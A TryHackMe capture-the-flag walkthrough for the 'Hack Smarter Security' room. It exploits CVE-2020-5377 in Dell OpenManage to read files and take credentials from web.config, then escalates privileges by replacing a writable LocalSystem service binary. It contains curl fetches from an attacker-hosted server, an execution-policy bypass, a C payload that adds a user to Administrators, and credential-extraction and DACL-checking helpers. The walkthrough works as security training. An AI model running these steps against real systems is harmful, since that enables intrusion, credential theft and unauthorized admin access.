Hack Smarter Security | TryHackMe Write-up

anuragtaparia, published in System Weakness, May 6, 2024

Hey, I am back with another write-up. Try this room and many more at TryHackMe!!!

NMAP Scan

nmap scan

nmap [IP] -sV -T5

We get five open ports: 21 (FTP), 22 (SSH), 80 (HTTP), 1311 (Dell OpenManage, HTTPS) and 3389 (RDP).

PORT 21

Anonymous login is allowed, and we find two files: a text file and a PNG.

FTP

The text file contains some credit card information.

Credit-Cards-We-Pawned.txt

Port 80 and 1311

First Let’s look at Port 80

Port 80

Let’s try directory enum

gobuster on port 80

gobuster dir -u [URL] -w /path/to/wordlist

Nothing interesting is found there, so let’s try port 1311.

port 1311

Port 1311 speaks HTTPS, so let’s switch to https://[IP]:1311

Great, we are dealing with Dell EMC OpenManage and have a login page in front of us, but let’s take a look around first.

port 1311 with https

The About page (linked in the footer) tells us that we are dealing with version 9.4.0.2.

About

Exploit

We find an exploit for CVE-2020-5377 on Exploit-DB.

Take a look at this post to learn more about the vulnerability.

The Exploit-DB script was not working, so I tried this script instead.

We are now able to retrieve files from the system. We start with C:\Windows\win.ini, a file that exists and is readable on every Windows system, which lets us confirm that the file read actually works before going after anything interesting. We know from the Nmap scan that RDP and SSH are reachable, so what we are looking for is credentials.

A good place for these is usually the web.config of an IIS application, which normally lives at
C:\inetpub\wwwroot\<application>\web.config, so we still need the application folder name. The Nmap scan showed that the HTTP title matches the domain name, so that is a likely candidate. Requesting \inetpub\wwwroot\hacksmartersec\web.config returns its content, and with it the credentials for the user Tyler.
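As an added example (not part of the original write-up or of the exploit script), here is a small Python helper for the two steps above: a canary check that the retrieved win.ini is the real file rather than an error page, and a parser that pulls credential-looking values out of a web.config once it has been retrieved. The win.ini and web.config contents embedded below are constructed for this example; the host, user and password values in them are made up and are not the ones from the room.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample of C:\Windows\win.ini as found on a modern Windows host
# (not the content retrieved from the target).
SAMPLE_WIN_INI = """; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
"""

# Constructed sample web.config. Host, user and password values are made up
# for this example and are NOT the credentials from the room.
SAMPLE_WEB_CONFIG = """<configuration>
  <connectionStrings>
    <add name="AppDb"
         connectionString="Server=localhost;Database=app;User Id=dbuser;Password=S3cretDbPass!" />
  </connectionStrings>
  <appSettings>
    <add key="SmtpHost" value="mail.example.local" />
    <add key="ServiceUser" value="svc_app" />
    <add key="ServicePassword" value="ExamplePassword123" />
  </appSettings>
  <system.web>
    <identity impersonate="true" userName="svc_web" password="AnotherExample!" />
  </system.web>
</configuration>
"""

# Keys worth reporting: usernames are as useful as passwords when the next
# step is SSH or RDP.
SECRET_KEY_RE = re.compile(r"user|uid|pass|pwd|secret|token", re.IGNORECASE)


def looks_like_win_ini(content: str) -> bool:
    """Canary for an arbitrary file read: a real win.ini always carries the
    [fonts] and [extensions] sections, whereas a 404 page or an application
    error message will not."""
    sections = {line.strip().lower() for line in content.splitlines()}
    return "[fonts]" in sections and "[extensions]" in sections


def extract_credentials(web_config: str) -> list:
    """Return (location, value) pairs for credential-looking settings in an
    IIS/ASP.NET web.config: connection string parts, appSettings keys and any
    element carrying a literal password attribute (e.g. <identity impersonate=...>)."""
    root = ET.fromstring(web_config)
    found = []

    # connectionStrings pack "key=value;key=value" into a single attribute
    for add in root.iterfind("./connectionStrings/add"):
        name = add.get("name", "?")
        for part in add.get("connectionString", "").split(";"):
            if "=" not in part:
                continue
            key, value = part.split("=", 1)
            if SECRET_KEY_RE.search(key):
                found.append((f"connectionStrings/{name}/{key.strip()}", value.strip()))

    # appSettings are flat key/value pairs
    for add in root.iterfind("./appSettings/add"):
        key = add.get("key", "")
        if SECRET_KEY_RE.search(key):
            found.append((f"appSettings/{key}", add.get("value", "")))

    # anything else that carries a password attribute
    for elem in root.iter():
        for attr, value in elem.attrib.items():
            if attr.lower() == "password":
                found.append((f"{elem.tag}@{attr}", value))

    return found


if __name__ == "__main__":
    print("win.ini canary:", looks_like_win_ini(SAMPLE_WIN_INI))
    for where, value in extract_credentials(SAMPLE_WEB_CONFIG):
        print(f"{where}: {value}")
```

In practice you would feed the two functions the bytes returned by the file-read primitive; if the canary fails, the traversal is not working and the "web.config" you got back is most likely an error page.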

running CVE-2020–5377

With these credentials we can log in via SSH.

ssh to Tyler

We look for user.txt and find it.

user.txt

For privilege escalation we will use PrivescCheck (https://github.com/itm4n/PrivescCheck).
We serve it over HTTP from our own machine (python3 -m http.server 1234 works just as well):

python2 -m SimpleHTTPServer 1234

and fetch the script on the target with curl:

curl http://10.9.1.214:1234/PrivescCheck.ps1 -o PrivescCheck.ps1

Then run it with the command below. It takes a while to complete.

powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck"

running PrivescCheck.ps1

PrivescCheck reports a very likely vulnerability, rated High: the spoofer-scheduler service can be started and stopped by a normal user, and it runs as LocalSystem. If we can replace the service's executable, e.g. with a reverse shell or a program that creates an admin account for us, the service control manager will run our code as SYSTEM the next time the service starts, and we have escalated our privileges.
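As an added example (not the page's own code and not part of PrivescCheck), here is the check behind that finding in Python: it parses a service's security descriptor as printed by `sc sdshow spoofer-scheduler` and reports which low-privileged principals hold start, stop or reconfigure rights on it. The two SDDL strings embedded below are constructed for the example, one resembling a default service DACL and one resembling the misconfiguration described above; they are not the actual descriptor from the room. The mapping of two-letter SDDL rights to service rights is the documented one.

```python
import re

# Two-letter rights in a service SDDL (as printed by "sc sdshow <service>")
# mapped to the service access rights they stand for.
SERVICE_RIGHTS = {
    "CC": "SERVICE_QUERY_CONFIG", "DC": "SERVICE_CHANGE_CONFIG",
    "LC": "SERVICE_QUERY_STATUS", "SW": "SERVICE_ENUMERATE_DEPENDENTS",
    "RP": "SERVICE_START", "WP": "SERVICE_STOP",
    "DT": "SERVICE_PAUSE_CONTINUE", "LO": "SERVICE_INTERROGATE",
    "CR": "SERVICE_USER_DEFINED_CONTROL", "SD": "DELETE",
    "RC": "READ_CONTROL", "WD": "WRITE_DAC", "WO": "WRITE_OWNER",
    "GA": "GENERIC_ALL", "GR": "GENERIC_READ",
    "GW": "GENERIC_WRITE", "GX": "GENERIC_EXECUTE",
}

# SID abbreviations that mean "any ordinary user on the box".
LOW_PRIV_SIDS = {"AU": "Authenticated Users", "BU": "Users",
                 "IU": "Interactive", "WD": "Everyone"}

# Rights that let a low-privileged user influence what the service runs.
INTERESTING = {"SERVICE_START", "SERVICE_STOP", "SERVICE_CHANGE_CONFIG",
               "WRITE_DAC", "WRITE_OWNER", "GENERIC_ALL", "GENERIC_WRITE"}

# ACE layout: (ace_type;ace_flags;rights;object_guid;inherit_object_guid;account_sid)
ACE_RE = re.compile(r"\(([A-Z]+);([^;]*);([^;]*);([^;]*);([^;]*);([^)]*)\)")

# Constructed: a typical default service DACL. Interactive users (IU) may only
# query and interrogate the service, so nothing here is exploitable.
DEFAULT_SDDL = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
                "(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)"
                "S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)")

# Constructed to resemble the misconfiguration PrivescCheck reported: Authenticated
# Users (AU) get RP (start) and WP (stop). Not the real descriptor from the room.
WEAK_SDDL = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
             "(A;;CCLCSWRPWPDTLOCRRC;;;AU)")


def parse_dacl(sddl: str) -> list:
    """Return (ace_type, rights, sid) for each ACE in the D: part of an SDDL string."""
    m = re.search(r"D:[A-Z]*((?:\([^)]*\))*)", sddl)
    if not m:
        return []
    aces = []
    for ace in ACE_RE.finditer(m.group(1)):
        ace_type, _flags, rights_str, _guid, _inherit, sid = ace.groups()
        if rights_str.startswith("0x"):
            rights = {"RAW:" + rights_str}   # numeric access mask: not decoded here
        else:
            rights = {SERVICE_RIGHTS.get(rights_str[i:i + 2], rights_str[i:i + 2])
                      for i in range(0, len(rights_str), 2)}
        aces.append((ace_type, rights, sid))
    return aces


def weak_service_aces(sddl: str) -> list:
    """List (principal, [rights]) for allow-ACEs that give ordinary users control
    over the service; an empty list means the DACL looks sane."""
    hits = []
    for ace_type, rights, sid in parse_dacl(sddl):
        if ace_type != "A" or sid not in LOW_PRIV_SIDS:
            continue
        bad = sorted(rights & INTERESTING)
        if bad:
            hits.append((LOW_PRIV_SIDS[sid], bad))
    return hits


if __name__ == "__main__":
    for label, sddl in (("default", DEFAULT_SDDL), ("weak", WEAK_SDDL)):
        print(label, weak_service_aces(sddl) or "no weak ACEs")
```

Start/stop rights alone are only half the story: the service binary (or its folder) must also be writable by the same user, which is what the next step confirms. A service that a normal user can start but whose executable they cannot touch is not a privilege escalation.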

spoofer-scheduler vuln

We confirm that we can write to C:\Program Files (x86)\Spoofer. We now need a reverse shell executable that Windows Defender does not recognise; a plain msfvenom payload gets detected and deleted straight away.

writing in C:\Program Files (x86)\Spoofer

Instead, I chose to create an executable that adds the Tyler user to the local Administrators group.

A very simple C program does this:

#include <stdlib.h>

/* Once the service starts this binary it runs as LocalSystem, so the
   "net localgroup" call succeeds even though tyler is a normal user. */
int main(void) {
    system("cmd.exe /c net localgroup Administrators tyler /add");
    return 0;
}

Now we compile it into a Windows executable:

x86_64-w64-mingw32-gcc-win32 payload.c -o payload.exe

Now we stop the scheduler service:

sc stop spoofer-scheduler

Now we rename the original executable, upload ours under the original name, and start the service again so that it executes our payload as LocalSystem.

executing payload

After logging in again (group membership is only reflected in a fresh logon token), I was part of the Administrators group.

I am admin

We can now read Hacking-Targets.txt.

Hacking-Targets.txt

The room was nice; I enjoyed doing it.

Happy Hacking!
